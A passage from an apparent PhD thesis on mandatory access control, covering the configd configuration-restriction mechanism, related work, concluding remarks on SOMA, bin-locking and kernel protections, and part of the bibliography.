ing of multiple packages), including Inkscape Pidgin and Digikam The new files installed during the application install were marked as c-locked,there were no errors displayed by the package installer, and the application rancorrectly after install. The sequence of tests verified that the prototype systemis capable of supporting the install of new packages, as well as the upgrade andre-install of already-installed packages.
Effects on Root of Restricting Configuration Changes
Because root no longer has permission to modify arbitrary files on disk, anyconfiguration changes performed directly by the root user will be potentially bedisallowed by configd or a related per-application encapsulation mechanism(configuration changes performed during install by the related install script areeasily allowed; see Section In the prototype system, configuration changesperformed by the physical user acting as root ended up being approved, sincethe person modifying the application configuration and the person approvingthe change when queried by configd are one and the same. Because any up-dates to configuration require an individual acting as root to perform them, webelieve the extra step of the same individual verifying the change before it ispropagated to disk to be minor (e.g., the user updates the configuration file andthen authorizes that the update be written to disk when prompted by configd).
Indeed, we can avoid querying the user about configuration changes if the im-plementation of configd exports a user interface for performing changes (e.g.,by providing a text editor). Such an ability does not detract from the secu-rity of the system because applications still do not gain the ability to write tofile-system objects belonging to other applications.
Benefits over Android or GoboLinux
While the approach draws from both GoboLinux version 014.01 and Androidversion 2.0, there are several significant improvements over each approach(see Section GoboLinux does not cleanly support upgrades, and henceeach version of an application will be installed alongside the previous versions.
A limitation with Android is that it did not support install scripts, and it relieson a permission model where each application is assigned its own account.
6.6. Related Work
Configd takes the benefits of both (GoboLinux being able to run install scripts,and Android being able to support upgrades) and combines them, resulting ina system which supports upgrades and works with traditional binary packagesand file-system layout.
Related Work
Here we discuss selected related work, beyond that discussed in Section
Secure Software Installation
Venkatakrishnan et al. proposed RPMShield, a system where actions whichwill be performed during install of a package are presented to the administratorfor verification and then all install actions are logged. RPMShield concentrateson install time, not preventing already-installed applications from modifyingthe system if they are run as root. While configd focuses on encapsulating anapplication's file-system objects, RPMShield focuses on allowing the system ad-ministrator to examine and approve the actions which will be performed duringinstall.
Kato et al. proposed SoftwarePot, an approach where each application
is encapsulated in its own sandbox, with mediated access to the file-system andnetwork. Shared files are accessed by mapping sandbox-specific file-namesto global file-system objects. The mapping between sandbox-specific files andglobal file-system objects requires additional information not currently distributedwith an application package. SoftwarePot encountered a 21% overhead in exe-cution time, while configd encountered a 4.8% overhead.
Sun et al. proposed grouping applications into two categories, those
which are trusted, and those which are not. All untrusted applications areinstalled inside a common sandbox, while trusted applications are not. The ap-proach relies on the ability to always properly identify and classify malicious ap-plications as untrusted. It does not prevent trusted applications from modifyingfile-system objects related to other trusted applications (and indeed, untrustedapplications can modify file-system objects related to other untrusted appli-cations). Configd, in contrast, does not distinguish between trusted and un-trusted applications, treating all applications equally and restricting the modi-fications which can be performed on file-system objects.
Chapter 6. Configd
Smart Phones
Those developing smart phones learnt from the instability and malware prob-lems in the desktop space. Instead of segregating users (since each deviceis assumed to be used by a single user), they took the direction of segregat-ing applications. Smart phone architectures also disabled the granting of rootpermission to applications on the system. Smart phone vendors have long re-tained strong control of their devices, having important reasons for limitingthe damage an application could do to (or with) the device (e.g., due to strictbroadcasting regulations).
On the iPhone platform, each application must be signed by Apple before
being loaded onto the device. This approach assumes Apple will be able toproperly vet all applications before allowing them to be loaded onto the device,an assumption which has proven risky (indeed, Apple now has a mechanismfor disabling malicious applications which happen to slip through Theapproach also has scalability drawbacks.
The encapsulation approach taken by the Android smart phone is discussed
Rootkit Resistant Disks
Butler et al. proposed a method where regions of disk were marked as re-quiring a specific USB key to be inserted before they could be updated. Theapproach works at the block level, underneath the file-system. Blocks on diskbecome marked as associated with a USB key when they are updated whilethe key is installed. In their approach, the user is involved in differentiatingbetween when a system should be used to perform day-to-day operations andwhen the system is being configured. This separation, however, does not carryover into isolating day-to-day and configuration operations. Because the protec-tion mechanism is implemented underneath the operating system at the blocklevel, applications used for performing day-to-day operations continue to run(and even inherit configuration permission) when the user inserts a USB keyindicating they want to change the configuration of the system. The Butler etal. approach of attempting to restrict configuration operations closely parallelsthe first step in our limiting the potential for abuse in root file-system privilege– the separation of configuration from normal day-to-day activities performedon a system.
The approach taken by Butler et al. attempts to further minimize the po-
tential for abuse through the use of multiple USB keys, but does not reach anapplication level granularity. Indeed, they suggest using different tokens for dif-
6.6. Related Work
ferent roles (e.g., one token associated with all binaries and another associatedwith all configuration files)
Other Related Work
The splitting of root privilege is a common technique for limiting abuse in areasother than file-system control. Techniques such as capabilities and fine-grained access control also split up root, but focus mainly on installedapplications, not the installers themselves.
In the past few years, virtual machines (VMs) have started to become much
more popular in server environments, to allow a single machine to run multipleinstances of an operating system As part of the popularization of virtualenvironments, the opportunity to introduce additional segregation between ap-plications has arisen. Each VM instance runs its own instance of an operatingsystem and is assigned its own file-system and display. A typical setup involvingvirtual machines still groups many related applications together in a single VM.
In this chapter, we focus on a method for dividing up root file-system privilegeto prevent abuse by applications running on the same instance of the operatingsystem, regardless of whether or not that OS happens to be running in a vir-tual machine. While the practice of an ordinary user installing applications intotheir home directory avoids root entirely, the application's file-system objectsare not protected against modification by other applications the user installs(or indeed, any application the user happens to run).
Ioannidis et al. introduced the concept of sub-operating systems, mark-
ing each file with a label indicating where it came from. These labels restrictwhat data files an application is allowed to access at a finer granularity thanthe user. Sub-OS does not explicitly tackle limiting the abuse of root file-systemprivilege during the process of installing, upgrading, and removing an applica-tion. Polaris likewise focuses on application data, restricting what userfiles an application can access based on user interaction with the window man-ager.
Fine-grained access control systems, such as SELinux and those imple-
mented by Solaris restrict an application's permission based on the labelsassigned to both that application and the resources it wishes to use. Thesesystems have the potential to split up root file-system privilege, parallelling theapproach used herein. Traditionally, however, such policies have focused onrun time system state (i.e., when the system is being used for day-to-day activ-ities) as opposed to installers and related file-system configuration operations.
In Linux, the default SELinux security policy has dpkg being granted write ac-cess to almost every file on the system Other systems, such as AppArmor
Chapter 6. Configd
appear to work best when new applications are not being installed or up-graded. In the current environment where applications are routinely upgraded,not supporting installs or upgrades is a problem.
While projects such as DTE-enhanced UNIX and XENIX restrict
the privileges of root (including root's ability to configure the system), weare unaware of any such privilege systems designed to restrict configurationchanges during install, upgrade, or uninstall (i.e., it seems most installers canstill be run with such privileges, again still having full access to all file-systemobjects on disk). For systems using the OpenBSD schg and ext2 immutableflags, any application can be given the ability to change an immutable file– the user can simply be asked to run an application after acquiring sufficientconfiguration privileges. SVFS protects files on disk but is susceptible tothe same problem of inadequate control over installation applications.
There have been many attempts to detect malicious modifications to system
configuration. Windows file protection (WFP) maintains a database ofspecific files which are protected, along with digital signatures of them. WFP isdesigned, however, to protect against a non-malicious end-user, preventing onlyaccidental system modification. Pennington et al. proposed implementingan intrusion detection system in the storage device to detect suspicious modifi-cations. Strunk et al. proposed logging all file modifications for a periodof time to assist in the recovery after malware infection. Tripwire main-tains cryptographic hashes of all files in an attempt to detect modifications.
All these proposals detect modifications after the fact. Applications such asregistry watchers and clean uninstallers attempt to either detect orrevert changes made to a system by an application installer. These systemssimilarly don't prevent changes in system configuration.
The separation of configuration privileges as proposed in this chapter pre-
vents installers from making unauthorized changes to system state, leadingto a proactive rather than reactive approach to limiting system configurationchanges. Package managers and the Microsoft installer both limitsystem configuration actions allowed by packages designed for their system,but do not prevent applications from simply providing their own installer (orinstall script), bypassing the limits enforced by the package manager.
The approach discussed in this chapter provides a method for restricting modi-fications to an application on disk. While updates to the application are allowed,the ability for an application to modify the file-system objects associated with
6.7. Final Remarks
another application are not allowed. These restrictions bring much-needed ad-ditional security to desktops in a world where different applications all sharethe file-system, and yet may not be trustworthy themselves. The approach doesnot rely on the end-user for enforcement, protects all applications installed, andis implemented by a guardian (the OS and configd developer). It therefore fol-lows the thesis goal of providing a guardian enforced mandatory access controlmechanism which can be deployed.
Summary and Concluding
Remarks
In this thesis, we have proposed four new mandatory access control mecha-nisms. Each of these mechanisms was designed to be set by a guardian whois able to make security related decisions. In each approach, the applicationdevelopers are, by design, not able to directly take control of policy decisions.
Furthermore, end users need not themselves police the mechanism. In not re-quiring an expert user, we believe the mechanisms will be deployable to a wideaudience.
A Summary of the Protection Mechanisms
Many JavaScript-based attacks require that compromised web pages communi-cate with attacker-controlled web servers. The joint work SOMA restricts cross-domain communication to a web page's originating server and other serversthat mutually approve of the cross-site communication. By preventing unap-proved cross-domain communication, attacks such as cross-site scripting andcross-site request forgery can be blocked.
SOMA imposes no configuration or usage burden on end users. The policy is
set by guardians, namely the administrators of sensitive web servers and webbrowser developers. The changes required by SOMA are easy for server admin-istrators to understand, giving them a chance to specify what sites can interactwith their content. SOMA is also incrementally deployable with incrementalbenefit. The limitations of SOMA include that it is not able to restrict commu-nication between JavaScript functions loaded by the browser, it requires buy-in
7.1. A Summary of the Protection Mechanisms
from browser vendors and site administrators, and it is only able to restricttraffic for web applications which rely on the browser.
Limiting Privileged Processor Permission
The current lack of protection between root level user control and privilegedprocessor control on a system leads to a situation where it is possible for appli-cations to bypass restrictions enforced on user space processes (even those runwith root privileges). As an example, the current ability to prevent root fromaccessing a FUSE based file-system can be bypassed by root altering thekernel. Root can also alter the page-table mapping of arbitrary processes byrunning code with privileged processor control.
The overly permissive permissions granted to root has a negative effect on
the system. Both malware and legitimate user space processes have sufficientpermission to negatively affect the system. For example, the ability to performwrites to the underlying hard drive on a mounted file-system can lead to usersdamaging to their own file-systems by corrupting critical system files, eventhough the user is using a non-malicious user space application.
The approaches detailed in this thesis for restricting the ability to run code
with privileged processor control help prevent subversion of mandatory accesscontrol policies imposed by the kernel on user space processes – includingpre-existing approaches such as SELinux and AppArmor as wellas new mechanisms proposed in this thesis such as bin-locking (Chapter and configd (Chapter The restrictions include locking down raw writesto mounted file-systems and swap, restricting access to kernel memory devicefiles, preventing arbitrary kernel modules from being loaded, and preventingarbitrary modification of the boot loader, kernel, and kernel modules on disk.
While some of the restrictions are previously known and have been deployed byMicrosoft on Windows, we focus our analysis on Linux by evaluating a prototypeimplementation. The implementation discussed in Chapter has a negligibleimpact on end-user day-to-day use and defends against current malware rootk-its.
When binaries are being installed, the current (almost universal) situation isthat the installer has write access to essentially the entire file-system – far toocoarse a granularity, from a security-oriented perspective. To address this, wepresented bin-locking, a mechanism based on digitally signing software and
Chapter 7. Summary and Concluding Remarks
extending the kernel to protect binaries on disk against modification by unau-thorized software. One of the key features not widely addressed by previous fileprotection schemes (to our knowledge) is built-in support for software applica-tion upgrades. With many applications now receiving regular patches, dealingwith upgrades in a smooth and non-intrusive manner is important. The pro-posed system enforces a separation between binary files belonging to differentapplications. Even with privileges sufficient to install an application, binary filesbelonging to one application cannot be modified by an application created by adifferent developer. While we do not restrict the ability to bin-lock binaries tocertain vendors, we suspect that the vendors most interested in the capabilitiesoffered by bin-locking may be those who develop or provide system monitoringutilities and crucial services.
Configd is a framework for restricting configuration changes, including kernelextensions and an associated user-space daemon. The status quo on end-useroperating systems is dangerous – giving every application full access to the file-system during install, upgrade, and removal. We provide the foundation of a fullsolution including concept, architecture, design, and prototype implementationproving out the design. The design provides a mechanism for reducing rootabuse of file-system privileges without breaking normal software operation.
Our end-goal is to eliminate the property whereby every process running
with root privilege can change arbitrary files on disk, as this is commonlyabused by malware on current desktop operating systems. A necessary partof this involves restricting the ability for applications to modify each other'sfile-system objects on disk. Our proposal mitigates the security risks associatedwith install mechanisms in common use today, wherein software installers (typ-ically downloaded from the Internet) are run as root. The problem addressedherein is long-standing. While the proposal is specific to Linux, we see no rea-son why a similar approach could not be used on Windows.
Revisiting Thesis Objectives
As stated in Chapter this thesis focuses on mandatory access control mech-anisms which are set by a guardian. All mechanisms introduced in this thesisallow applications to continue to share resources, including the file-system andnetwork. At the same time, the mechanisms introduced enforce a greater iso-
7.2. Revisiting Thesis Objectives
lation of applications, preventing a number of the attacks which have becomecommon place in both the desktop and web environments.
We met the constraints stated in the thesis hypothesis (on page by de-
signing each of the mandatory access control mechanisms so that they requiredlittle end-user or developer security expertise, and result in better overall ap-plication security. Each of the four mechanisms discussed was prototyped andtested to confirm that it could be used on current real-world systems. This in-cluded testing backwards compatibility (when appropriate), and verifying thatthe overhead of each mechanism was reasonable.
The mechanisms introduced provide new approaches for restricting the abil-
ities of applications in an effort to better protect software systems againstmalware.
The introduction of new kernel protections in Linux, along with
bin-locking and configd, provide three guardian-based access control mech-anisms positively answering the thesis question. SOMA provides a guardian-based access control mechanism which further supports our hypothesis. Themechanisms provided answer the stated question, providing four representa-tive mechanisms which fall under the category of MAC policies being enforcedby a guardian. We believe MAC policies set by a guardian are an importantsubset, choosing to formally recognize them. The mechanisms we discussedare designed to be implemented by the operating system developer. SOMA isdesigned to be implemented by the browser developer. By publishing thesemechanisms, we draw attention to the guardian subset of mandatory accesscontrol policies, satisfying the second goal of our work (on page
In this section, we discuss several insights gleaned from developing the manda-tory access control mechanisms discussed in this thesis. While our insights andpersonal views have arisen from our experience, rather than in all cases beingdirectly supported by specific scientific experimentation, we nevertheless offerthem to stimulate further discussion and exploration.
1. We believe that the guardian based access control mechanisms most ac-
ceptable to both application developers and users have characteristicscommon in many other domains, including parenting. Such policies in-volve both tenderness and firmness towards both users and developers.
While we have no proof for such a statement, we believe that environ-ments which are overly restrictive are likely to be disliked by either ap-plication developers or users. Furthermore, environments which are too
Chapter 7. Summary and Concluding Remarks
loosely constrained have led to the current situation in which malware isprevalent on the desktop and in the web environment.
2. We believe that the approach of not depending on application developers
for security enforcement is the only realistic choice to make. Because ap-plication developers have various skill sets, it is not prudent to assumethat they will all be capable of writing secure software. Furthermore,some application developers actively try to subvert systems by writingmalware. To depend on the user to perform the task of security police ap-pears also to be an unwise decision. The vast majority of computer usersare not security experts. The approach taken in this thesis is to developsecurity mechanisms which are designed to be set by a knowledgeableguardian, one well-versed in security and capable of making decisionswhich benefit both legitimate application developers and users. We be-lieve that in the past, too much trust has been placed in the developer'sability to security design their applications. We suspect this assumption oftrust in the developer lead to a scenario where alternate approaches forincreasing security were not actively pursued.
3. Computers were initially developed for use by very technically minded
people in solving specific tasks Developers initially had completefreedom and flexibility in most of their design choices. Developers ar-gue against limitations, preferring instead to retain complete freedom.
This resistance from developers, however, is based on two different argu-ments, which we believe are non-overlapping. The first is the argumentthat the developer, as a user, will loose control over the ability to recon-figure the device they own. On this point, we choose not to prevent theowner of the hardware device from ultimately subverting the mandatoryaccess control policies enforced in software. The other point is whetherthe developer should be allowed to have arbitrary control over other's de-vices through the software they develop. On this point, we take the sideof not allowing the developer total control over other's devices, since mal-ware commonly takes advantage of exactly this ability. In this thesis, weattempt to take away some of the freedom of developers when designingsoftware for other's devices. We attempt to do this without offending toomany other parties (i.e., without too many other negative impacts). Wedo so by creating new MAC policies which are set by a guardian, avoidingmany end-user usability problems.
4. The mandatory access controls discussed in this thesis focused on areas
which are often exploited by malware, but less seldom used by legitimatesoftware. We chose to focus on exactly these areas in developing manda-
7.3. Open Problems
tory access control policies which can be set by a guardian. Should wehave chosen to implement a more restrictive policy in areas commonlyused by legitimate software, we believe we would have encountered sig-nificant usability problems. Indeed, many of the guardian based policieswhich have already been deployed (including the JavaScript same originpolicy and execute disable) provide significant benefits while having ac-ceptable usability by a non-expert. We believe there are still gains to bemade in examining features made available by the application environ-ment and commonly used by malware but not by legitimate software.
5. Both bin-locking and configd took advantage of the common developer
paradigm of code reuse It is typically considered bad practice fora developer to re-implement someone else's code. One consequence ofthe paradigm of code reuse is that an individual shared library on diskis not likely to be created by multiple independent parties, a fact thatbin-locking and configd used in their design. We believe there may beother guardian set policies which can be created by examining generallyaccepted developer design patterns.
In this thesis, we concentrated on preventing one software application frommodifying (and thereby harming) another. In the web environment, the SOMAprotection mechanism focused on the fetching of external content, since this isthe most often used avenue through which attacks are performed. SOMA didnot concentrate on those operations performed which do not require a fetch ofcontent, or those operations which require fetching content from a server whichhas already been approved through the SOMA process. While the current ap-proaches of further limiting the communication between web applications havebeen focused on giving the application developers the tools required to pro-tect their applications, we do not believe there has been enough focus placedon how to ensure that these tools are used properly (or indeed, even at all).
We therefore see opportunity for additional guardian based mandatory accesscontrols which restrict communication between web applications (e.g., SOMAdid not handle ad-syndication). We also see opportunity for additional researchinto generating improved fine-grained policies for web pages. (e.g., mashups
Mutual approval, as discussed in Chapter provides a mechanism for both
parties to declare their approval for the sharing of information. While SOMAfocused on applying this mutual approval mechanism to web applications, we
Chapter 7. Summary and Concluding Remarks
see an opportunity for additional research into the application of such a policyoutside the web context.
On the desktop, our solutions focused solely on preventing an application
from obtaining privileged processor control, and restricting the ability to mod-ify other applications' file-system objects on disk. This thesis did not focus onthe problem of how to protect inter-process communication between applica-tions. We believe there is the potential for additional guardian based mandatoryaccess control policies to be developed which restrict the inter-process commu-nication without placing significant additional assumptions on the abilities ofeither the end-user or application developer.
The desktop-based mandatory access control policies and related mecha-
nisms discussed in this thesis are designed to limit the ability for applicationsto modify other applications file-system objects. Another problem which we donot address is that of a Trojan horse application. Such an application is self-contained, not needing to modify other applications on disk in order to carryout its nefarious activities. Bot-net clients which do not attempt to hide onthe end-user desktop also fall into the category of not needing to modify otherapplications installed on the system in order to function. While this work re-sults in malware being kept distinct from other applications on the file-system,it remains an open problem how to prevent application malware from beinginstalled in the first place.
[1] Linux Application Development, chapter 8. Creating and Using Libraries.
Addison-Wesley Professional, 2nd edition, Nov 2004.
[2] F. Adelstein, M. Stillerman, and D. Kozen. Malicious code detection for
open firmware. In Proc. 18th Annual Computer Security ApplicationsConference, pages 403–412, Dec 2002.
[3] Adobe Systems Incorporated.
External data not accessible outside a
Macromedia Flash movie's domain. Technical Report tn_14213, AdobeSystems Incorporated, Feb 2006.
[4] Alexa top 500 sites. Web Page (viewed 14 Apr 2008).
[5] Android developers. Web site (viewed 18 Nov 2009).
[6] Apple, Inc. iPhone developer program license agreement, Jun 2008.
[8] A. Apvrille, D. Gordon, S. Hallyn, M. Pourzandi, and V. Roy. Digsig: Run-
time authentication of binaries at kernel level. In Proc. 18th USENIXConference on System Administration (LISA), pages 59–66, Nov 2004.
[9] W. A. Arbaugh, D. J. Farber, and J. M. Smith. A secure and reliable boot-
strap architecture. In Proc. 18th IEEE Symposium on Security and Pri-vacy, pages 65–71, May 1997.
[10] M. Balduzzi, M. Egele, E. Kirda, D. Balzarotti, and C. Kruegel. A so-
lution for the automated detection of clickjacking attacks. In Proc. 5thACM Symposium on Information, Computer and Communications Secu-rity, Apr 2010.
[11] A. Baliga, X. Chen, and L. Iftode. Paladin: Automated detection and con-
tainment of rootkit attacks. Technical Report DCS-TR-593, Rutgers Uni-versity Department of Computer Science, Jan 2006.
[12] A. Baliga, P. Kamat, and L. Iftode. Lurking in the shadows: Identifying
systemic threats to kernel data. In Proc. 28th IEEE Symposium on Secu-rity and Privacy, pages 246–251, May 2007.
[13] P. Barham, B. Dragovic, K. Fraser, S. Hand, T. Harris, A. Ho, R. Neuge-
bauer, I. Pratt, and A. Warfield. Xen and the art of virtualization. In Proc.
19th ACM Symposium on Operating Systems Principles, pages 164–177,Oct 2003.
[14] E. G. Barrantes, D. H. Ackley, T. S. Palmer, D. Stefanovic, and D. D. Zovi.
Randomized instruction set emulation to disrupt binary code injectionattacks. In Proc. 10th ACM Conference on Computer and CommunicationSecurity, pages 281–289, Oct 2003.
[15] A. Barth, J. Caballero, and D. Song. Secure content sniffing for web
browsers, or how to stop papers from reviewing themselves. In Proc. 30thIEEE Symposium on Security and Privacy, pages 360–371, May 2009.
[16] A. Barth, C. Jackson, and J. C. Mitchell. Robust defenses for cross-site
request forgery. In Proc. 15th ACM conference on Computer and Com-munications Security, pages 75–88, Oct 2008.
[17] A. Barth, J. Weinberger, and D. Song. Cross-origin JavaScript capability
leaks: Detection, exploitation, and defense. In Proc. 18th USENIX Secu-rity Symposium, Aug 2009.
[18] M. Bauer. Paranoid penguin: an introduction to Novell AppArmor. Linux
Journal, 148:36,38,40–41, Aug 2006.
[19] A. Beautement, M. A. Sasse, and M. Wonham. The compliance budget:
Managing security behaviour in organizations. In Proc. 2008 New Secu-rity Paradigms Workshop, pages 47–58, Sep 2008.
[20] D. Bell and L. LaPadula. Secure computer systems: Mathematical foun-
dations. Technical Report MTR-2547, Vol. 1, MITRE Corporation, Mar1973.
[21] D. Bell and L. LaPadula. Secure computer systems: Unified exposition
and multics interpretation. Technical Report MTR-2545, Rev 1, MITRECorporation, Mar 1975.
[22] A. Bellissimo, J. Burgess, and K. Fu. Secure software updates: Disap-
pointments and new challenges. In USENIX 2006 Workshop on Hot Top-ics in Security (HotSec 2006).
[23] K. Biba. Integrity considerations for secure computer systems. Technical
Report MTR-3153, MITRE Corporation, Apr 1977.
[24] M. Bishop. Computer Security: Art and Science. Addison Wesley, 2003.
[25] H. Bojinov, E. Bursztein, and D. Boneh. Xcs: Cross channel scripting
and its impact on web applications. In Proc. 16th ACM Conference onComputer and Communications Security.
[26] D. Botta, R. Werlinger, A. Gangé, K. Beznosov, L. Iverson, S. Fels, and
B. Fisher. Towards understanding IT security professionals and theirtools. In Proc. 3rd Symposium on Usable Privacy and Security, Jul 2007.
[27] D. Brewer and M. Nash. The chinese wall security policy. In Proc. 10th
IEEE Symposium on Security and Privacy, pages 206–214, May 1989.
[28] G. Brunette. Restricting service administration in the Solaris 10 operat-
ing system. Technical Report 819-2887-10, Sun Microsystems, 2005.
[29] bsign. Web site (viewed 22 Jan 2009).
[30] K. R. B. Butler, S. McLaughlin, and P. D. McDaniel. Rootkit-resistant
disks. In Proc. 15th ACM Conference on Computer and CommunicationsSecurity, pages 403–415, Oct 2008.
[31] J. Cappos, J. Samuel, S. Baker, and J. H. Hartman. A look in the mirror: At-
tacks on package managers. In Proc. 15th ACM Conference on Computerand Communications Security, pages 565–574, Oct 2008.
[32] M. Carbone, W. Cui, L. Lu, W. Lee, M. Peinado, and X. Jiang. Mapping
kernel objects to enable systemic integrity checking. In Proc. 16th ACMConference on Computer and Communications Security, Oct 2009.
[33] CERT. CERT advisory ca-2000-02: Malicious HTML tags embedded in
client web requests. Technical Report CERT Advisory CA-2000-02, CERT,2000.
[34] S. Chen, D. Ross, and Y.-M. Wang.
An analysis of browser domain-
isolation bugs and a light-weight transparent defense mechanism. InProc. 14th ACM Conference on Computer and Communications Security,pages 2–11, Oct 2007.
[35] D. Clark and D. Wilson. A comparison of commercial and military security
policies. In Proc. 8th IEEE Symposium on Security and Privacy, pages184–194, May 1987.
[36] R. Coker. Re: [DSE-Dev] refpolicy: domains need access to the apt's pty
and fifos. Mailing List Post, Mar 2008.
[37] J. Collake. Hacking Windows file protection. Web Page, 2007.
[38] Common Weakness Enumeration. 2010 CWE/SANS Top 25 Most Dan-
gerous Programming Errors, Apr 2010.
[39] C. Cowan, P. Wagle, C. Pu, S. Beattie, and J. Walpole. Buffer overflows:
Attacks and defenses for the vulnerability of the decade. In DARPA Infor-mation Survivability Conference and Expo, pages 119–129, Jan 2000.
[40] R. S. Cox, J. G. Hansen, S. D. Gribble, and H. M. Levy. A safety-oriented
platform for web applications. In Proc. 27th IEEE Symposium on Securityand Privacy, pages 350–364, May 2006.
[41] crazylord. Playing with Windows /dev/(k)mem. In Phrack, volume 0x0b
(0x3b), chapter 0x10. Jul 2002.
[42] D. A. Curry. UNIX System Security: A Guide for Users and System Ad-
ministrators. Addison-Wesley, 1992.
[43] S. Dandamudi. Guide to RISC processors for programmers and engi-
neers. Springer, 2005.
[44] G. Davida, Y. Desmedt, and B. Matt. Defending systems against viruses
through cryptographic authentication. In Proc. 10th IEEE Symposium onSecurity and Privacy, pages 312–318, May 1989.
[45] D. W. Davies. The bombe - a remarkable logic machine. Cryptologia,
23(2):108–138, Apr 1999.
[46] D. Dean, E. Felten, and D. Wallach.
Java security: From HotJava to
Netscape and beyond. In Proc. 17th IEEE Symposium on Security andPrivacy, pages 190–200, May 1996.
[47] The Debian GNU/Linux FAQ: Chapter 8 - The Debian Package Manage-
ment Tools, 2008.
[48] S. DeDeo. Pagestats extension. Web Page, May 2006.
[49] D. E. Denning. A lattice model of secure information flow. Communica-
tions of the ACM, 19(2):236–243, 1976.
[50] P. J. Denning. Computers Under Attack: Intruders, Worms, and Viruses,
chapter 17. Computer Viruses, page 290. Addison Wesley, 1990.
[51] D. Dittrich.
"root kits" and hiding files/directories/processes after a
break-in. Web Page, 2002.
[52] B. Dolan-Gavitt, A. Srivastava, P. Traynor, and J. Giffin. Robust signatures
for kernel data structures. In Proc. 16th ACM Conference on Computerand Communications Security, Oct 2009.
[53] EasyDesk Software. Registry watch. Web Page (viewed 23 Apr 2009).
[54] C. Ellison. RFC 2692: SPKI requirements. Technical report, Internet En-
gineering Task Force, Sep 1999.
[55] D. Evans and D. Larochelle.
Improving security using extensible
lightweight static analysis. In IEEE Software, number 1 in 19, pages42–51. IEEE Computer Society, Jan 2002.
[56] "Digital Signature Standard", Federal Information Processing Stan-
dards Publication 186.
Technical report, U.S. Department of Com-
merce/N.I.S.T., National Technical Information Service, 1994.
[57] Fuse: Filesystem in userspace. Web Page (viewed 5 Mar 2010).
[58] E. Gamma, R. Helm, R. Johnson, and J. Vlissides. Design Patterns: Ele-
ments of Reusable Object-Oriented Software. Addison-Wesley, 1995.
[59] T. Garfinkel and M. Rosenblum. A virtual machine introspection based ar-
chitecture for intrusion detection. In Proc. 10th Network and DistributedSystems Security Symposium, pages 191–206, Feb 2003.
[60] I. Goldberg, D. Wagner, R. Thomas, and E. Brewer. A secure environment
for untrusted helper applications (confining the wily hacker). In Proc. 6thUSENIX Security Symposium, Jul 1996.
[61] Google. Android developer guide. Developer Website, 2009.
[62] J. B. Grizzard.
Towards Self-Healing Systems: Re-establishing Trust
in Compromised Systems. PhD thesis, Georgia Institute of Technology,2006.
[63] J. Grossman and T. Niedzialkowski. Hacking intranet websites from the
outside – JavaScript malware just got a lot more dangerous. In BlackhatUSA, Aug 2006.
[64] S. E. Hallyn and A. G. Morgan. Linux capabilities: Making them work. In
Proc. Ottawa Linux Symposium, Jul 2008.
[65] J. Heasman. Implementing and detecting a PCI rootkit. In Blackhat DC,
[67] G. Hoglund and J. Butler.
Rootkits: Subverting the Windows Kernel.
Addison-Wesley Professional, 2005.
[68] J. Howell, C. Jackson, H. Wang, and X. Fan. MashupOS: Operating system
abstractions for client mashups. In Proc. 11th USENIX Workshop on HotTopics in Operating Systems, May 2007.
[69] Intel Corporation. Intel 64 and IA-32 Architectures Software Developer's
Manual Volume 3A: System Programming Guide, Part 1. Number 253668.
Intel, Dec 2009.
[70] S. Ioannidis, S. M. Bellovin, and J. M. Smith. Sub-operating systems: a
new approach to application security. In Proc. 10th Workshop on ACMSIGOPS European Workshop, pages 108–115, Jul 2002.
[71] C. Jackson, A. Barth, A. Bortz, W. Shao, and D. Boneh.
browsers from dns rebinding attacks. In Proc. 14th ACM Conferenceon Computer and Communications Security, pages 421–431, Oct 2007.
[72] C. Jackson, A. Barth, A. Bortz, W. Shao, and D. Boneh.
browsers from dns rebinding attacks. ACM Transactions on the Web,3(1), 2009.
[73] C. Jackson, A. Bortz, D. Boneh, and J. C. Mitchell. Protecting browser
state from web privacy attacks. In Proc. 15th International Conferenceon World Wide Web, pages 737–744, May 2006.
[74] C. Jackson and H. J. Wang. Subspace: secure cross-domain communica-
tion for web mashups. In Proc. 16th International Conference on WorldWide Web, pages 611–62, May 2007.
[75] I. Jackson and C. Schwarz. Debian Policy Manual, 1998.
[76] T. Jaeger, R. Sailer, and X. Zhang. Analyzing integrity protection in the
SELinux example policy. In Proc. 12th USENIX Security Symposium,pages 59–74, Aug 2003.
[77] M. Jakobsson and Z. Ramzan. Crimeware: Understanding New Attacks
and Defenses. Addison-Wesley Professional, 2008.
[78] N. Jovanovic, E. Kirda, and C. Kruegel. Preventing cross site request
forgery attacks. In Proc. 2nd IEEE Conference on Security and Privacyin Communication Networks, Aug 2006.
[79] C. Karlof, J. Tygar, D. Wagner, and U. Shankar. Dynamic pharming attacks
and locked same-origin policies for web browsers. In Proc. 14th ACMConference on Computer and Communications Security, pages 58–71,Oct 2007.
[80] K. Kato and Y. Oyama. Softwarepot: An encapsulated transferable file
system for secure software circulation. In Proc. of International Sympo-sium on Software Security, volume Lecture Notes in Computer Science2609/2003, pages 217–224, 2003.
[81] B. Kauer. Oslo: Improving the security of trusted computing. In Proc.
16th USENIX Security Symposium, pages 229–237, Aug 2007.
[82] G. S. Kc, A. D. Keromytis, and V. Prevelakis. Countering code-injection at-
tacks with instruction-set randomization. In Proc. 10th ACM Conferenceon Computer and Communication Security, pages 272–280, Oct 2003.
[83] K. Keahey, K. Doering, and I. Foster. From sandbox to playground: Dy-
namic virtual environments in the grid. In Proc. Fifth IEEE/ACM Interna-tional Workshop on Grid Computing, pages 34–42, Nov 2004.
[84] J. Keith. DOM Scripting: Web Design With JavaScript and the Document
Object Model, chapter 3. The Document Object Model. Springer-Verlag,2005.
[85] A. Kim.
Apple's ability to deactivate malicious app store apps.
[86] G. H. Kim and E. H. Spafford. Experiences with Tripwire: Using integrity
checkers for intrusion detection. Technical Report CSD-TR-93-071, Pur-due University, 1993.
[87] G. H. Kim and E. H. Spafford. The design and implementation of Trip-
wire: A file system integrity checker. In Proc. 2nd ACM Conference onComputer and Communications Security, pages 18–29, Oct 1994.
[88] S. T. King, J. Tucek, A. Cozzie, C. Grier, W. Jiang, and Y. Zhou. Designing
and implementing malicious hardware. In Proc. 1st USENIX Workshopon Large-Scale Exploits and Emergent Threats, Apr 2008.
[89] E. Kirda, C. Kruegel, G. Vigna, and N. Jovanovic. Noxes: A client-side
solution for mitigating cross site scripting attacks. In Proc. 21st ACMSymposium on Applied Computing, pages 330–337, Apr 2006.
[90] A. Kjeldaas.
Linux capability FAQ v0.1.
Mailing List Post, Aug
[91] D. V. Klein. Defending against the wily surfer — web-based attacks and
defenses. In Proc. 1st USENIX Workshop on Intrusion Detection andNetwork Monitoring, pages 9–21, Apr 1999.
[92] Knoppix Linux. Web Page (viewed 15 Dec 2008).
[93] Y. Korff, P. Hope, and B. Potter. Mastering FreeBSD and OpenBSD Secu-
